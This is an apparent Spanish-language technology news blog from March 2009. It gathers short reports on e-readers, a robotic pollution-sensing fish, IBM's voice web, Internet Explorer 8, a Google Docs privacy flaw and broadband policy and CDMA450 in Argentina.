El catálogo de Google incluye títulos tradicionales como 'The Awakening', una novela corta de Kate Chopin o 'Black Beauty', de Anna Sewell, entre otros, además de materiales de autores que son de mas difícil acceso público.

También se ofrecen títulos en idiomas diferentes al inglés, incluido el español, y pueden ser seleccionados por temas, títulos o autores.

Sony informó, de acuerdo a la agencia Efe, de que hay dos modelos disponibles de Reader, con un precio de 300 y 350 dólares, y están equipados en ambos casos con un cable USB para conectar a la PC.

El acuerdo entre Sony y Google tiene lugar más de un año después de que la compañía minorista en Internet Amazon lanzase su lector electrónico de libros, Kindle, aunque en este caso permite al usuario descargar las obras de Amazon.com mediante una conexión inalámbrica a la Red.

Amazon presentó en febrero pasado una versión nueva de su lector electrónico, el Kindle 2, de menor tamaño y mayor capacidad que el anterior y mediante el que se puede acceder a unos 230.000 libros y a numerosas publicaciones de Estados Unidos y otros países.

Además, a comienzos de este mes, lanzó una aplicación gratuita para el iPhone y el iPod Touch, que permite a los usuarios de esos aparatos leer los libros disponibles para su dispositivo Kindle.

Un pez robot estudiará la contaminación en aguas de España

El androide desarrollado por científicos británicos será soltado en aguas de Asturias para detectar el impacto en el medio ambiente.

Según informó la agencia Reuters, si las pruebas del próximo año de los primeros cinco peces robot en el puerto de Gijón tienen éxito, el equipo espera que sea utilizado en ríos, lagos y mares de todo el mundo.

Los robots con forma de carpa imitan los movimientos de un pez real y están equipados con sensores químicos para localizar agentes contaminantes potencialmente peligrosos, como filtraciones de barcos o de tuberías subterráneas.

A un costo de unos 39.000 dólares, el pez robot transmitirá la información a tierra utilizando tecnología Wi-Fi. A diferencia de versiones anteriores, éste podrá navegar de forma independiente sin interacción humana y tendrá 1,5 metros de longitud, aproximadamente el tamaño de una foca.

Rory Doyle, principal científico de la firma de ingeniería BMT Group -que desarrolló el robot junto con investigadores de la Essex University-, dijo: "Al usar un pez robótico, estamos partiendo de un diseño creado por cientos de millones de años de evolución, que increíblemente es eficiente energéticamente".

Sunday, March 22, 2009

IBM prepara una web especial para teléfonos móviles

Las páginas se podrán recorrer con comandos de voz. Esta innovación fue probada exitosamente en la India por el Gigante Azul

IBM prepara una web especial para teléfonos móviles

Cegados por nuevas tecnologías como las pantallas multitáctiles o el emergente seguimiento de la vista para controlar los dispositivos, a veces no se repara en técnicas que no sean visuales.

IBM desarrolló una tecnología con la que pretende que el usuario "hable" con un tipo de web sólo para móviles.

La división india de IBM diseñó una nueva forma de concebir los hipervínculos, similar a la que se tiene de Internet para las computadoras.

"La gente hablará a la web y la web responderá", informó el director asociado del Laboratorio de Investigación de IBM India Manis Gupta, en declarciones al diario India Times.

"La tecnología de investigación es análoga a Internet. Al contrario que las computadoras personales, funcionará en móviles, donde la gente puede crear sencillamente sitios de su voz", continuó Gupta.

La web hablada es una red de sitios de voz o "voz y respuesta interconectadas". La compañía hizo algunas pruebas en Andhra Pradesh y Gujarat, en la India, y el tipo de innovación que la gente descubrió con esta nueva forma de interconectar sitios dejó a los que lo han probado "atónitos", según Gupta.

Para este tipo de sitios, IBM desarrolló un nuevo protocolo, denominado Procolo de Transferencia de Hiperdiscurso -Hyperspeech Transfer Protocol, (HSTP)-, que es similar al Protocolo de Transferencia de Hipertexto -Hypertext Transfer Protocol (HTTP)-, que es el empleado en Internet en computadoras.

Lanzan la nueva versión de Internet Explorer

Microsoft lo define como "más rápido, más fácil y más seguro" y asevera que permite llegar a la información con menos clicks que el resto de los navegadores disponibles en el mercado

Microsoft Corp lanza la versión definitiva de su navegador Internet Xplorer 8 (IE8), la cual promete mayor velocidad y más seguridad que su antecesor.

Tras un año de versiones de pruebas públicas, se lanza la nueva versión del navegador de Microsoft, que incluye una serie de características pensadas para intentar arañar parte del mercado perdido frente a otros, sobre todo Firefox de Mozilla.

"Internet Explorer 8 es más fácil, más rápido y más seguro", proclamó durante su presentación en Madrid Verónica Olocco, responsable de la División de Windows Client de Microsoft Ibérica, según El Mundo de España.

De acuerdo a unas pruebas realizadas por la propia compañía, IE8 es más rápido que la competencia (Chrome, Firefox) en la mayor parte de los sitios más visitados del mundo, gracias a mejoras como su optimización para JavaScript, por ejemplo. "Los tests son relativos, naturalmente", comentó a continuación Olocco, quien añadió que "IE8 no se desarrolló para ser más rápido en el laboratorio, sino en casa".

El navegador, del que se habló mucho en los últimos meses, estrena dos características muy remarcadas por Microsoft. Por un lado, la figura de los aceleradores, una función que permite seleccionar parte del texto de un sitio web y, como si se tratase del botón derecho del mouse, despliega una ventana (si se hace click en un botón que aparece sobre el texto seleccionado) que permite a su vez funciones variadas, desde localizar la dirección en un mapa hasta enviar un correo con esa información o traducir el propio texto sin abrir pestañas nuevas.

Por otro lado, IE8 presume su Web Slice, otra función que permite ver en la nueva pestaña de favoritos miniversiones de los sitios web seleccionados, sin necesidad de abrirlos.

Se trata de una función que requiere, por un lado, que el sitio web seleccionado en favoritos se haya adaptado (existe un kit de desarrollo para ello) y, por otro, que la propia función no esté deshabilitada. "Cualquier sitio web puede adaptarse con el kit de desarrollo para IE8 (IEK)", apuntó Olocco.

La seguridad viene reforzada por dos herramientas. El filtro SmartScreen previene el phishing a través de avisos bastante grandes que alertan al usuario si éste aterriza en un sitio potencialmente inseguro. Además, el modo de navegación InPrivate borra el historial y evita la instalación de cookies. "El navegador se lanza con la seguridad predeterminada al máximo", apuntó Olocco.

La versión se podrá descargar de internet en varios países, en versiones para Windows XP (imprescindible el Service Pack 2) y Windows Vista, aunque la demostración fue realizada sobre Windows 7, el nuevo sistema operativo de Microsoft que saldrá a finales de año, según la compañía.

Por último, el navegador será naturalmente compatible con Silverlight, la plataforma multimedia online de Microsoft para juegos, videos, y animaciones dinámicas con gráficos avanzados, que compite con otras tecnologías como flash de Adobe.

Mientras prosigue la llamada guerra de los navegadores, tras las mejoras de Firefox y Safari y la aparición en el panorama de Chrome de Google, Microsoft mantiene un nuevo frente abierto con la Unión Europea, que teme un eventual abuso de posición dominante por parte de Microsoft.

Fruto de estas acusaciones fue la reciente respuesta de la compañía, que permitirá en Windows 7 desactivar el navegador. "Estaremos de acuerdo con lo que diga la Unión Europea en este aspecto", comentó Juan Carlos Fernández, director general de consumo y online de Microsoft Ibérica.

Investigarán la privacidad en Google

La causa es una falla en su software de la oficina online. Durante unas horas, toda la información que los usuarios guardan en los servidores de Google Docs pudo ser vista por otras personas

Los servicios web de Google cayeron bajo la lupa de los organismos de defensa de la privacidad en internet. El Centro para la Privacidad de la Información Electrónica (EPIC por sus siglas en inglés) denunció a Google ante la Comisión Federal de Comercio de los Estados Unidos, para que se investigue una falla de seguridad en su software de oficina online, Google Docs.

Durante unas horas, toda la información que los usuarios guardan en los servidores de Google Docs pudo ser vista por otras personas. La falla se produjo a principios de este mes, fue detectada por los propios ingenieros de Google y afectó al 0,05% de los documentos.

En Google Docs se pueden crear documentos de texto, planillas de cálculo y presentaciones gráficas, sin instalar ni comprar ningún programa. Además, esos documentos se archivan en los servidores de Google y el usuario puede acceder a ellos desde cualquier computadora conectada a internet.

Ahora, la EPIC reclama que se investigue el nivel de seguridad que todos los sistemas "cloude computing" de Google, esto es, los servicios online basados en softwares que se pueden usar desde internet, como el webmail Gmail, el álbum de fotos Picasa y, el epicentro del problema, Google Docs, según informa el diario Clarín.

En la Argentina esa empresa ya está analizando la petición de la EPIC.

Saturday, March 21, 2009

El Gobierno reclama a “telcos” inversiones para brindar y mejorar el acceso a Internet

Desde la Comisión Nacional de Comunicaciones le apuntan a la cobertura geográfica y a la calidad del servicio de conexión a la Red. También dicen que apoyan una tecnología que favorece la llegada de los servicios de telecomunicaciones en áreas rurales y suburbanas

El Gobierno reclama a “telcos” inversiones para brindar y mejorar el acceso a Internet

El Gobierno nacional salió en público a reclamar a las empresas de telecomunicaciones que inviertan en sus redes para aumentar la penetración territorial y la calidad de la conexión a Internet.

El vocero del pedido oficial fue el interventor de la Comisión Nacional de Comunicaciones (CNC), Ceferino Namuncurá, durante un congreso regional en Buenos Aires donde se analizó la tecnología CDMA450.

Desde el Poder Ejecutivo entienden que este sistema podría favorecer la llegada de la Red a zonas rurales y suburbanas y la competencia en el sector de las telecomunicaciones.

“Tengo una gran preocupación y es que luego de cuatro años (de gestión) hoy todavía existe una demanda real insatisfecha de Internet”, dijo el funcionario. “Es mi impresión de lo que está pasando en la Argentina y esto involucra a todos los actores del sector”, aclaró.

Según informó esta semana el Instituto Nacional de Estadística y Censos (INDEC), el número de conexiones a Internet residenciales aumentó un 18,5 por ciento durante 2008, por el impulso de las cuentas de banda ancha que en ese período crecieron más del 37 por ciento.

Sin embargo, continúa una elevada concentración de los accesos residencial en Buenos Aires y sus alrededores y en las principales ciudades bonaerenses, que acaparan el 66 por ciento del total de vínculos.

De acuerdo al Barómetro Cisco, la penetración de las conexiones de banda ancha en la Argentina por cada 100 habitantes es de 7,79 por ciento.

De las 24 provincias argentinas, si se cuenta a la ciudad de Buenos Aires como una de ellas, sólo seis superan la media. Y de las 18 provincias restantes, diez no alcanzan el 3% (ver más sobre la situación del mercado en las notas relacionadas).

Luego de insistir en que “hay una necesidad insatisfecha de grandes sectores de la población para tener Internet”, y en plantear su preocupación por los “niveles de los servicios”, Namuncurá apuntó que el propio sector gubernamental también demanda a los operadores “para que haya un despliegue de infraestructura”. Incluso advirtió que “el Estado debería tener mayor participación en la infraestructura” de telecomunicaciones, aunque no dio precisiones sobre cómo sería esa participación.

“La Argentina hoy tiene un problema de transmisión. Las estrategias que hay (por el lado de los operadores), que no las comparto, pasan por competir en infraestructura. Creemos que hay otras estrategias”, dijo Namuncurá.

En ese sentido, apuntó que hace un año se lanzó por el lado de las “telcos” la oferta de “Internet inalámbrica” a través de las redes de tercera generación (3G), “lo que demostró que la infraestructura debe crecer”, señaló el interventor de la CNC. “Se pensaba que la gran demanda iba a estar en el área metropolitana Buenos Aires cuando en realidad fue en el interior del país”, en especial en zonas que carecen de conexiones de banda ancha fija a la Red.

Sin embargo, advirtió que los operadores “debieron parar sus planes comerciales porque las celdas no la soportan (a esa demanda) como tampoco las redes”.

Namuncurá también apuntó a los niveles de servicio. “Existen ciudades de 30 mil, 40 mil, 50 mil habitantes donde hoy se presta el servicio (de conexión a Internet) pero no hay satisfacción” por parte del cliente, debido a velocidades bajas del enlace o cortes en el servicio.

Aunque aclaró que el Gobierno no se enfoca “exclusivamente en tecnologías” de conectividad, Namuncurá reparó que “la apertura de CDMA450 es todavía una potencialidad muy importante” y prometió apoyo desde el Gobierno para la extensión de esta tecnología.

¿Una alternativa?

¿Qué es CDMA450? Es un sistema de transmisión de telecomunicaciones que opera en la franja del espectro radioeléctrico de los 450Mhz. Los operadores pueden utilizarla para llegar con sus servicios a amplias zonas de baja densidad de población donde ni los móviles llegan. Una de las ventajas de esta tecnología es su amplia cobertura, que llega a los 50 kilómetros en espacios llanos.

CDMA 450 proporciona telefonía fija e Internet, y puede habilitarse como servicio móvil, con mayor eficacia que la frecuencia de 900Mhz. Con una sola antena de CDMA450 se cubre lo mismo que tres antenas de 900MHz.

Durante la conferencia regional sobre esta tecnología organizada por el Grupo Convergencia en Buenos Aires, se expusieron casos de aplicaciones en América latina. En coincidencia con Namuncurá, Celedonio von Wuthenau, director regional del grupo de desarrollo de CDMA (CDG, sigla en inglés) apuntó que “la demanda de banda ancha va a ser mayor” en los próximos años. “Hoy la gente busca datos, usar el e-mail navegar por Internet”, dijo el empresario.

En la Argentina hay seis operadores comerciales de CDMA450, mientras que otros proveedores pidieron el uso de esa frecuencia en más de 80 localidades.

La Cooperativa Telefónica de Calafate Limitada (Cotecal) fue el primer operador de una red CDMA450 comercial en el país. Por medio de una red instalada por la empresa china ZTE, la compañía brinda servicios de telefonía local fija, acceso a Internet y otros servicios de valor agregado para acceso a datos en las ciudades santacruceñas de El Calafate y El Chaltén.

La Cooperativa Telefónica de Villa Gesell (Cotel) puso en marcha un servicio similar de telefonía inalámbrica, mediante este sistema, en este caso con tecnología provista por la empresa china Huawei.

Además de la Argentina, hay otros cinco países en la región que utilizan CDMA450: Ecuador, México, Perú, Surinam y Venezuela. Todas estas implementaciones comerciales son para servicios fijos inalámbricos.

Si bien en un primer momento se pensó el uso de CDMA450 para pequeñas ciudades y áreas rurales donde el espectro se encontraba disponible, Telefónica comenzó también a ofrecer servicios CDMA450 en las áreas urbanas de Lima y Callao (Perú), dada la gran habilidad de esta tecnología para cubrir áreas de baja penetración, independientemente de la densidad demográfica.

Por supuesto que CDMA450 no es la única opción que tienen los operadores entrantes para competir con las sucesoras de Entel, Telefónica y Telecom. Por ejemplo, WiMAX, es una banda licenciada para telefonía inalámbrica fija en la frecuencia de 3,5 GHz. En ella pone sus fichas la mexicana Telmex, que compró hace unos años Ertach.

En cambio, las cooperativas telefónicas son las que respaldan la apuesta por CDMA450 para dar servicios de telefonía inalámbrica fija y acceso a Internet.